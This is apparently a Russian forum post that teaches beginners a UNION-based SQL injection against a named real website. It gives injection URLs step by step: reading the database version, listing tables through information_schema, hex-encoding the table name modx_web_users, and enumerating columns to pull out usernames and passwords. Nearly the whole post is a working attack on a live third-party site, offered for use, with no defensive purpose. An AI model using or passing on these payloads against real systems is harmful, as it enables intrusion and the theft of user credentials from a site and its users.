Воть крутанул : http://vklybe.ru/index.php?o=g&id=-167+union+select+version(),2,3,4
Версия: 5.0.45
Воть для новичков разжую:
http://vklybe.ru/index.php?o=g&id=-167+union+select+version(),2,3,4 - Так узнаем версию
Поскольку версия 5+ то в ней присутсвует - information_schema .... начинаем копаться в ней!!!
http://vklybe.ru/index.php?o=g&id=-167+union+select+table_name,2,3,4+from+information _schema.tables+limit+17,1 и так меняем до +limit+87,1 тама смарите, что вам нужно!
Каким же способом посмареть дапустим таблицу modx_web_users - это limit+85,1 ?? Да очень просто!!! Идем на сайт http://k0x.ru/encoder/index.php ! И в поле Text* пишем modx_web_users и жмем Send! После тама появятся поля, нам нужно самое первое, тобишь HEX тама будет вот такое 0x6d6f64785f7765625f7573657273 ! Это Sql HEX ! Вообще можно просто перевести слово через любую вашу прогу(сайт) и просто добавляем 0x ! Вот такой запрос нужно сделать после того как мы узнали Hex код таблицы modx_web_users :
http://vklybe.ru/index.php?o=g&id=-167+union+select+column_name,2,3,4+from+informatio n_schema.columns+where+table_name=0x6d6f64785f7765 625f7573657273+limit+1,1
Ну вот мы нашли всеми долгожданный username и password ! всё также просматривается через limit+1,1 , limit+2,1 и т.д.
Ну потом смотрим юзернаймы и пассы!!!